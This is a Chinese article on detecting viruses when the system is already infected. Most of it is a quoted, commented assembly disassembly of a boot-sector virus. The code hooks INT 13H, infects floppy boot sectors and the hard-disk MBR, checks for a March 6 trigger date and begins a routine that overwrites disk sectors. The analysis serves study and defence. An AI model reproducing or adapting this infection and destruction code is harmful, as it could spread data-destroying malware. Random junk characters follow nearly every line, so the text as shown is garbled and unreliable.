近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 iyf vcKO
?? UgZuEfEGve
?? 一 、 带毒环境下检测清除病毒的意义 N(^
q%eHp
?? ).1F0T
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 P>i[X0UnL
?? YeCS`IXm
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 s:\FlQ0
?? x.~A vJ
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 }0~4Z)?e3
?? x\R
8W8M
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 m'.y,@^B
?? .+ g8zbD4
?? 二 、带毒环境下检测清除病毒的原理 mXXU{IwUe
?? g
O ;oM?|
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 LL^WeD_Y
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 )> |x 2q
jUCrj'
u'+;/8
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " }&O}t{gS*
病毒体: S4FR=QuVQC
JMP 01AF ;JMP到01AF g/6>>p`J
DB 00 ;病毒标计 =Hwlo!
DW 00F5 ;此为搬到高位址后,远程跳转指令 `z{sDe;
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX '&hk?
DB 02 3=~0m
DW 0003 ;此为软盘识别标记,硬盘为0007 HTU?hbG(
DW EC59 ; ev;R; 0<
DW F000 ;INT 13H的原入口 \_J;i[
. a8laPN
. ~*Kk+w9H<
. L1J~D?q
. &;]KntxB
. R-V4Ju[:
XOR AX,AX ;清除AX vhOX1'
MOV DS,AX; ;让DS=0000 yvp$s
CLI ;清I标志积存器 U sS"WflB
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 ~y.t amNW
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 eQqx0+-0c
MOV SP,AX ;开机时为0000:7CB6 TcM;6h`
STI ;设I标志积存器 zLda+
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A s/0S]P]}f
PUSH AX ;用RETF,把程序转到引导或分区表位置 DYFfq
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 sV`!4
u7%}
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 7dbGUbT
MOV AX,[004E] ;取INT 13H的段地址 ?(d<n
MOV [7C0C],AX ;存到010C oi:!YVc
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 6wY6*R
;读写以便传播发作 )eaEc9o>
KJ;;825?
MOV AX,[0413] ;取得内存K数,放在AX `}Z`aK
DEC AX ; [Y_CRxa\u
DEC AX ;减2k内存 >q7/zl
MOV [0413],AX ;存回,通常是638K mxfmK +'_
MOV CL,06 ; FLzC kzJ:6
SHL AX,CL ; wYAi-gdOi
MOV ES,AX ;算出减2K后病毒本体的位址 \x9.[?;=e
MOV [7C05],AX ;AX存入0105 K~ob]I<GiB
|qFCzK9tD/
;病毒常用手法将系统高段内存减少以便驻留 }5qpiS"V9
;这样可以免于被其他程序覆盖 $zUHka
oW
\k%Vj
MOV AX,000E ;病毒拦INT 13H $]t3pAI[H0
;ISR起始的偏移量 yrVk$k#6}
MOV [004C],AX ; vQ",rP%
MOV [004E],ES ;设原为病毒的INT 13H 7U,[Ruu
MOV CX,01BE ;病毒长度为1BE A5[iFT>
MOV SI,7C00 ;从JMP 01AF开始 M\rZr3
XOR DI,DI ;DI=0 rCp'O\@S
CLD ;清方向标志 ]5Mq^@mD'
REPZ; F2:nL`]b[
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 Zt LZW/`
CS: ;分区表能载入0000:7C00正常运作 K*[`s'Ip-
JMP FAR [7C03] ;跳到为搬过后的位址 f\U(7)2
XOR AX,AX ;清AX }@H(z
MOV ES,AX ;ES=0000 "F+m}GJ=a
INT 13 ;复位磁盘 _(%;O:i
PUSH CS ; QxI^Bx
POP DS ;让DS=CS <tx`#,
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 *'ffMnSZ
MOV BX,7C00 ;读到0000:7C00 r(6$.zx
MOV CX,[0008] ;硬盘第0道,第7扇区 a
0+W-#G
CMP CX,+07 ;比较是否从硬盘启动 64R~ $km
JNZ 0213 ;不是跳0213 ly~tB LH}
MOV DX,0080 ;第一硬盘C:第零面 zz_(*0,Qcr
INT 13 ;用INT 13号中断,读 NwbX]pDT
JMP 023E ;跳023E比较日期,发作或正常开机 r&_bk
Y%
MOV CX,[0008] ;软盘0道,第3扇区 VkJBqRzBOa
MOV DX,0100 ;A:的第0面 JKy06I
INT 13 ;INT 13读盘 f5o##ia7:
JB 023E ;失败跳023E @D@_PA)e(
PUSH CS .:/[%q{k
POPES ;让ES=CS dlJc~|
MOV AX,0201 ; G~nQR
qv
MOV BX,0200 ; KqhE=2,
MOV CX,0001 ; i_<GSUTTr/
MOV DX,0080 ; vg;9"A!(
INT 13 ;读入C:的分区表到0200,以便下面比较 jH~VjE>
JB 023E ;失败跳023E *)u%KYGr
XOR SI,SI ;清SI H05xt$J
CLD ;清方向标志以便比较 RHv|ijYy
LODSW ;载入一个WORD到AX DT#F?@LG(
CMP AX,[BX] ;比较有无病毒存在..E9AC m:x<maP#E
JNZ 0287 ;没有则跳0287传染 mP[Z lS~"
LODSW ;载入一个WORD到AX /JbO $A
CMP AX,[BX+02] ;再次确认..0000 Zv&<r+<g
JNZ 0287 ;没有跳0287 Mv\]uAT`
XOR CX,CX ;清CX jWNF3\
MOV AH,04 ; M>g%wg7Ah
INT 1A ;取得日期 p|9Eue3j2
CMP DX,0306 ;是否为三月六日 %s*F~E
JZ 024B ;是跳024B传染 .6HHUy
RETF ;把程序交还给引导启动完成 $3)Z>p
e.VR9O]G
步骤4:病毒INT 13代码分析 q:ah%x[
方法:U s)9d\{
PUSH DS ;首先把要用到积存器 O~DdMW
PUSH AX ;入栈保存 }>$3B5}
OR DL,DL ;比较是否为软盘 sX[k}=HCK
JNZ 002F ;如不是则退出传染 -a\[`JHi
XOR AX,AX ;AX=0 PSREQK@}E
MOV DS,AX ;数据代段=0
-?vII~a9y
TEST BYTE PTR [043F],01 ;比较是否为A盘 Bm4fdf#A]
JNZ 002F ;不是则退出
SodYb
POP AX ;将以上保存积存器
ow2tfylV
POP DS ;弹栈恢复 ;%B:1Z
PUSHF ;压栈标志积存器 teX)!N [
CS: ;以便执行原INT 13 '9XSz?
CALL FAR [000A] ;执行原INT 13 D7|qFx;]g
PUSHF ;再次压栈 GMOnp$@H^s
CALL 0036 ;以便跳转到传染程序 =" ;G&)H-
POPF ;跳转到执行传染 2`P=ekF]
RETF 0002 ;结束中断调用返回 mZ0'-ax
POP AX ;恢复 Q nmv?YXS
POP DS ;堆栈 `RHhc{
CS: ;跳转到原正常INT 13 ESi'3mbeC
JMP FAR [000A] ;地址执行 /Xf_b.ZM&
#fT<]j(
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 W!B\VB
w
21g&
步骤5:传染过程分析 CX3yIe~u
方法:U oxZXY]$y
对软盘传染过程: kG>m(n
PUSH AX ;工 s~>0<3{5
PUSH BX ;作 W'" p:Uhq
PUSH CX ;寄 B0$ge"FK9
PUSH DX ;存 |* v w(
PUSH DS ;器 @ebSM#F?
PUSH ES ;入 k@}g?X`8
PUSH SI ;栈 L =9^Y/8Q
PUSH DI ;保存 2}0S%R(
PUSH CS ;以压/弹栈方式 /vNHb_-
POP DS ;使数据段DS和 hp3
<HUU
PUSH CS ;附加段ES均指向 hOj(*7__
POP ES ;代码段CS O/Mx$Q3re
MOV SI,0004 ;试4次 JyDg=%-$2
MOV AX,0201 ;设置各 R
q9(<'F
MOV BX,0200 ;积存器 ,-`A6ehg
MOV CX,0001 ;为读软盘 ^^(!>n6r^
XOR DX,DX ;引导扇区做准备 yt[*4gF4
PUSHF ;压栈标志积存器 Xv2Q8-}w
CALL FAR [000A] ;正常的INT 13调用 ;i-<dAV8B
JNB 0063 ;成功则转判断 +nz0ZQ9 a
XOR AX,AX ;不成功复位 > JP}OS
PUSHF ;磁盘继续读 pKkBAr,
CALL FAR [000A] ;如果4次 'Rq2x-72}
DEC SI ;均匀不成功 m5
l,Lxj
JNZ 0045 ;则退出跳转 WY$c^av<
JMP 00A6 ;退出传染 vocWV/
XOR SI,SI ;SI=0以便用 i{biQ|,.sL
CLD ;LODSW读入软盘 <`")Zxf+
LODSW ;第1或第2字进行比较 &`I 7aP|
CMP AX,[BX] ;比较如果不包含病毒标志 4Qj@:b
JNZ 0071 ;则跳转写传染 s`I]>e
LODSW ;如果已有标志 Btyp=wfN[
CMP AX,[BX+02] ;则退出 R
"qt}4m
JZ 00A6 ;传染子程序 H6Q!~o\"H
MOV AX,0301 ;为写盘准备 e N^6gub
MOV DH,01 ;如果是360K K9QC$b9(
MOV CL,03 ;则写到1面0道3扇区 WPDi)UX
CMP BYTE PTR [BX+15],FD ;比较软盘 Z3 O_K
JZ 0080 ;如果大于360K Lq]t6o]
MOV CL,0E ;写到1面0道14扇区 LO@o`JF
MOV [0008],CX ;写病毒标志到软盘 |31/*J!@z*
PUSHF ;调用原INT 13 UH`cWV Lpr
CALL FAR [000A] ;进行传染 m8<.TCIQ
JB 00A6 %`\=qSf*
MOV SI,03BE ;以下是将正常 Wa<SYJ
MOV DI,01BE ;引导扇区从 cceh`s=cU
MOV CX,0021 ;1BE起的21字节内容 ,;)_$%bHc
CLD ;搬移到病毒程序尾部 qQp;i{X
REPZ ;开始复制 C Xh>'K
MOVSW w`X0^<Fv
MOV AX,0301 ;写盘功能调用,写一个扇区 c1ptN
XOR BX,BX ;将病毒程序 L "5;<
MOV CX,0001 ;写入软盘引导扇区内 M,dp;
XOR DX,DX ;设置为软盘 qZYh^\
PUSHF a\*_b2 ^n
CALL FAR [000A] ;执行正常INT 13调用写盘 (d*~Qpi{7
POP DI ;将 x:iLBYf
POP SI ;工 1 Szv4
POP ES ;作 MnTqWC90
POP DS ;寄 !0X/^Xv@=
POP DX ;存 #b>D^=NV>)
POP CX ;器 tvcM<
e20
POP BX ;退 D]?yGI_
POP AX ;栈 /3j3'~0
RET ;返回调用处 s[Whg!2~
对硬盘传染过程:
*]*0uo
MOV CX,0007 ;第7扇区 <2t%<<%
MOV [0008],CX ;此处为硬盘引导标记
?)2; W
MOV AX,301 ;写功能调用 $ Gs|Z$(
MOV DX,0080 ;设置为硬盘 cv"Bhql
INT 13 ;将正常引导扇区写到0面0道7扇区内
[7Liken
JB 13E ;失败则转 go?}M]c%7
MOV SI,03BE ;原分区表地址 NeR1}W
MOV DI,01BE ;目标地址 qnJs,"sn
MOV CX,0021 ;整个分区表 ,qwVDYJ
REPNZ kE854Ej
MOVSW ;开始复制 [sZ,nB/
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 1s-=zs
;这样在分析着查看硬盘分区信息时仍能看到该部分 "Bl6)qw
;内容,以次来麻痹分析者 ]ASTw(4
MOV AX,0301 ;准备写病毒提进硬盘 ?U3~rro!
XOR BX,BX ;病毒体位置
]iry'eljy
INC CL ;第一扇区 <lP5}F87
INT 13 ;开始写盘传染 >!PCEw<i
JMP 013E ;转到13E处判断是否为3月6日,是则发作 p%-;hL!
wUKt$_]``
步骤6:破坏过程分析 Sz-TarTF
方法:U D-Q54 "^3
主要分析对硬盘数据破坏: q.ZkQN+
. O |0V mm
. 6+/BYN!&4
. 4VP$,|a
. 8iC9xSH[%
. FW:V<{f
MOV DL,80 ."j=s#OC(
MOV BYTE PTR[0007],04 (97&mhs3
;准备写硬盘 tZygTvK/S
MOV AL,11 ;写17个扇区 ^K0oJg.E
MOV BX,5000 OjsMT]
MOV ES,BX ;从内存ES:5000中处开始写 WO=P~F<